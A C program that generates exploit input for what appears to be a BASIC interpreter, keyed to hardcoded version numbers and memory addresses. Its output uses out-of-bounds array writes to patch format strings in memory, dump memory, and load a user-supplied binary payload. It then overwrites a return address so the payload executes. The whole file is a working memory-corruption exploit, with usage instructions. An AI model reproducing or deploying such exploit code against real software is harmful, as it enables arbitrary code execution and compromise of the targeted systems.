#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <inttypes.h>

#define UNCACHED(p) ((p) | 0x20000000)

#define ASSIGNMENT_SIZE 0x240
#define PRINT_USING_SIZE 0x3A0

#define OUTPUT_AREA 0x480000

struct version {
	char v[6];
	unsigned int allocBase, lg, feegg, returnAddress;
} versions[] = {
	{
		"95204",
		0xCD7B70,
		0x3e29b8,
		0x3e2710,
		(0x1ffeac0 + 0x90),
	},

	{
		"95205",
		0xCD7B70,
		0x3e29b8,
		0x3e2710,
		(0x1ffeac0 + 0x90),
	},

	{
		"95506",
		0xCDC370,
		0x3E0D30,
		0x3D6C90,
		(0x1ffeb30 + 0x90),
	}

	// TODO: 95520
};

#define allocBase versions[v].allocBase
#define lg versions[v].lg
#define feegg versions[v].feegg
#define returnAddress versions[v].returnAddress

//#define SKIP_0

int main(int argc, char **argv) {
	if(argc < 2) {
		printf("%s version [payload] [string]\n", argv[0]);
		printf("EG: %s 95205 payload.bin\n", argv[0]);
		return 1;
	}

	int v;
	for(v = 0; v < sizeof(versions) / sizeof(versions[0]); v++) {
		if(strcmp(argv[1], versions[v].v) == 0) {
			break;
		}
	}

	if(v == sizeof(versions) / sizeof(versions[0])) {
		printf("  [-] %s not supported\n", argv[1]);
		return 1;
	}

	// No payload specified, just print the non-payload patches
	if(argc < 3) {
		printf("These are separate programs - don't copy this output and run it all together...\n\n");

		printf("%%lg patch\n\n");

		printf("dim x(1,1073741824)\n");
		printf("# 0x%x: %%\"lg\" -> \"%%lu\"\n", lg);
		printf("x(0,%u)=2261634.0035834485\n", (unsigned int)(lg - (allocBase + ASSIGNMENT_SIZE)) / 8);

		printf("\n\n");

		printf("feEgG patch\n\n");

		puts("# Run %lg -> %lu patch before this!\n");
		printf("dim x(1,1073741824)\n");
		printf("# 0x%x: \"feEgG\" -> \"feEgGx\"\n", feegg);
		printf("x(0,%u)=132248070612326.0\n", (unsigned int)(feegg - (allocBase + ASSIGNMENT_SIZE)) / 8);

		printf("\n\n");

		printf("debugger\n\n");

		puts("# Run feEgG -> feEgGx patch before this!\n");
		printf("dim x(1,1073741824)\n");
		printf("print x(0,%u) using \"%%0.8x\"\n", (unsigned int)(OUTPUT_AREA - (allocBase + PRINT_USING_SIZE)) / 8);
	}
	else {
		char *pay = argv[2];
		FILE *f = fopen(pay, "rb");
		if(!f) {
			printf("  [-] bad file %s\n", pay);
			return 1;
		}

		char *string = NULL;

		// Optional string for the payload
		if(argc >= 4) {
			char *stringf = argv[3];
			FILE *fs = fopen(stringf, "rb");
			if(fs) {
				fseek(fs, 0, SEEK_END);
				size_t s = ftell(fs);
				rewind(fs);
				string = malloc(s + 1);
				fread(string, s, 1, fs);
				string[s] = '\0';

				fclose(fs);
			}
		}

		unsigned int heapBase = allocBase;

		if(string) {
			heapBase += 0x100;

			if(strlen(string) > 14) heapBase += 0x10;
			if(strlen(string) > 15) heapBase += 0x10;
			if(strlen(string) > 30) heapBase += 0x10;
			if(strlen(string) > 31) heapBase += 0x10;
			if(strlen(string) > 56) heapBase += 0x10;
			if(strlen(string) > 57) heapBase += 0x10;

			if(strlen(string) > 58) {
				printf("  [-] string too long (manually check in debugger where it will be)\n");
				return 1;
			}
		}

		fseek(f, 0, SEEK_END);
		size_t s = ftell(f);
		size_t sc = (s + 7) / 8;

		uint64_t *p = calloc(sc, 8);

		rewind(f);
		fread(p, s, 1, f);

		puts("# Run %lg -> %lu patch before this!\n");

		printf("dim x(1,%zu)\n", 0x40000000 + (sc + 1) / 2 - 1);

		unsigned int assignments = 0;

		unsigned int i;
		for (i = 0; i < sc; i++) {
			#ifdef SKIP_0
			if(p[i] != 0) {
				printf("x(0,%u)=%"PRIu64".0\n", UNCACHED(i * 8) / 8, p[i]);
				assignments++;
			}
			#else
			printf("x(0,%u)=%"PRIu64".0\n", UNCACHED(i * 8) / 8, p[i]);
			#endif
		}

		#ifdef SKIP_0
		unsigned int buffer = heapBase + ASSIGNMENT_SIZE * (assignments + 1);
		#else
		unsigned int buffer = heapBase + ASSIGNMENT_SIZE * (sc + 1);
		#endif

		printf("\nx(0,%u)=%u.0\n", (returnAddress - buffer) / 8, UNCACHED(buffer));

		if(string) {
			printf("s$=\"%s\"\n", string);
			free(string);
		}

		free(p);

		fclose(f);
	}

	return 0;
}
